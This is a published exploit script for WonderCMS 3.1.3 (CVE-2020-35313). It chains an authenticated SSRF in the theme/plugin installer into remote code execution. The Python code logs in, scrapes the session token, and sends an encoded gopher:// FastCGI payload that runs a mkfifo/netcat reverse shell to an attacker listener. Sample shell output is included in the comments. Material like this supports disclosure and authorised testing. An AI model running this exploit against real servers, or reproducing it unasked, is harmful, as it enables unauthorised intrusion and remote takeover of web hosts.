WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution

# Exploit Title: WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution
# Date: 2020-11-27
# Exploit Author: zetc0de
# Vendor Homepage: https://www.wondercms.com/
# Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip
# Version: 3.1.3
# Tested on: Ubuntu 16.04
# CVE : CVE-2020-35313

# WonderCMS is vulnerable to SSRF Vulnerability.
# In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS.
# The theme/plugin installer not sanitize the destination of github/gitlab url, so attacker can pointing te destinaition to localhost.  
# when the attacker can pointing the request to localhost, this lead to SSRF vulnerability. 
# the most high impact lead to RCE with gopher scheme and FastCGI running in port 9000
# 
# python exploit.py
# [+] Getting Token
# [+] Sending payload
# [+] Get reverse shell

# nc -lnvp 1234
# Connection from 192.168.43.103:56956
# /bin/sh: 0: can't access tty; job control turned off
# $ whoami
# www-data
# $

import requests
from bs4 import BeautifulSoup
from termcolor import colored
from time import sleep

print(colored('''

\ \      /_ \  \ | _ \ __| _ \  __|  \  |  __| 
 \ \ \  /(   |.  | |  |_|    / (    |\/ |\__ \ 
  \_/\_/\___/_|\_|___/___|_|_\\___|_|  _|____/ 
                                               
------[  SSRF to Remote Code Execution ]------
	''',"blue"))


loginURL = "http://wonder.com/loginURL"
password = "GpIyq0RH"
lhost = "192.168.43.66"
lport = "1234"
payload = "gopher://127.0.0.1:9000/_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2505%2505%2500%250F%2510SERVER_SOFTWAREgo%2520/%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP/1.1%250E%2503CONTENT_LENGTH132%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A//input%250F%2517SCRIPT_FILENAME/usr/share/php/PEAR.php%250D%2501DOCUMENT_ROOT/%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%2584%2504%2500%253C%253Fphp%2520system%2528%2527rm%2520/tmp/f%253Bmkfifo%2520/tmp/f%253Bcat%2520/tmp/f%257C/bin/sh%2520-i%25202%253E%25261%257Cnc%2520{}%2520{}%2520%253E/tmp/f%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500".format(lhost,lport)


r = requests.session()
data = { "password" : password }
page = r.post(loginURL,data)
if "Wrong" in page.text:
	print(colored("[!] Exploit Failed : Wrong Credential","red"))
	exit()

print(colored("[+] Getting Token","cyan"))
soup = BeautifulSoup(page.text, "html.parser")

allscript  = soup.find_all("script")
no = 0
for i in allscript:
	if "rootURL" in str(i):
		url = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ")
	elif "token" in str(i):
		token = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ")


def sendPayload(req,url,payload,token):
	getShell = url + "?installThemePlugin=" + payload + "&type=plugins&token=" + token
	req.get(getShell)

print(colored("[+] Sending payload","cyan"))
sleep(1)
print(colored("[+] Get reverse shell","cyan"))
sendPayload(r,url,payload,token)
print(colored("[+] Good bye","cyan"))